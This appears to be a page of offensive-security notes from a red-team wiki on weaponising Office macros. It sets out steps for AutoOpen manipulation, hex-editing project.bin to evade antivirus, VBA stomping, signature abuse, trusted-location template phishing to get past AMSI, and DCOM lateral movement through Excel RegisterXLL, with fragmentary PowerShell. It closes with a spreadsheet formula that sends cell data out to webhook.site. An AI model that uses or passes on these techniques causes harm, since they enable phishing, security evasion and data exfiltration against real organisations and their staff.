Macros / VBA

https://bettersolutions.com/vba/ribbon/OfficeCustomUIEditorFiles.zipbettersolutions.com

"MacroName=" to check if autoopen is enabled and wne:name to execute the autoopen

Macros = more than VBA - Excel 4.0 (XLM, only in Excel)

VBA has 2 intermediary languages - P-Code and Exe-Code

Every module stream start with PerformanCache (should be empty)

good success steps:

  1. abuse ambiguity in specs (e.g. ascii and unicode name fields pointing to same module stream)

  2. explore undocumented feature (Ctrl-F in specs for "must be ignored and "must not be present" )

  3. try deviating from specs

AV Bypass:

Add AutoOpen:

  1. open in 7zip > word > vbaData.xml

  2. Change name in MacroName to name.AUTOOPEN

  3. Extract project.bin and load into flexHex

  4. Select stream/module name and press ctrl-x which removes the project stream from the bin file,

  5. drop back into 7zip and replace old

Stop VBA reader from viewing:

  1. download the project.bin again in 7zip

  2. open in FlexHex as a normal file

  3. keep the magic bytes of the file, over write some of the data (basically to crash the bin when it gets executed)

VBA Stomp

Mark of the Web and Trust:

If we have a file from the target also, we can use the signing from that file to inject our payload into

Signature Abuse:

SOME ORGS USE 'MAILMERGE' FROM AN EXCEL ADDRESS LIST TO AUTOMATE WORK AND SEND PERSONALISED LETTERS

if a document is signed, we can execute VBA thats already signed (if enabled by the company)

in excel also, to avoid static anaylsis call the VBA function within a cell i.e. =PrintDocument()

we can then within the word document create a new macro called autoopen(), and re run the code it will automatically execute - avoiding all detection

COM/DCOM exploit:

Trusted location:

use trusted location to host template, reference that template in a doc used to phish

This method avoids all macros settings, AMSI and all security settings within office

https://netero1010-securitylab.com/evasion/execution-of-remote-vba-script-in-excelnetero1010-securitylab.com

Lateral movement - System a, admin to system b - start excel via dcom and force excel on system b to execute a excel doc

$a = [System.Activator]::CrteateInstance([type]:

$a.REgisterXLL("C:\FilePath\")

PST extension normally disregarded by AV

Playing with fields:

  1. open document -> insert -> fields

  2. MacroButton ->

information leaking via DNS ->

Get data from folder

refresh -> connection properties -> refresh on open etc

Navigate to Advanced Editor -> res=Table.SelectRows(Source, each(Text.ContainsName, "dll")

call home:

=webservice("https://webhook.site/APIkey?"&encodeurl(A1))
PreviousAMSI bypassNextETW bypass

Last updated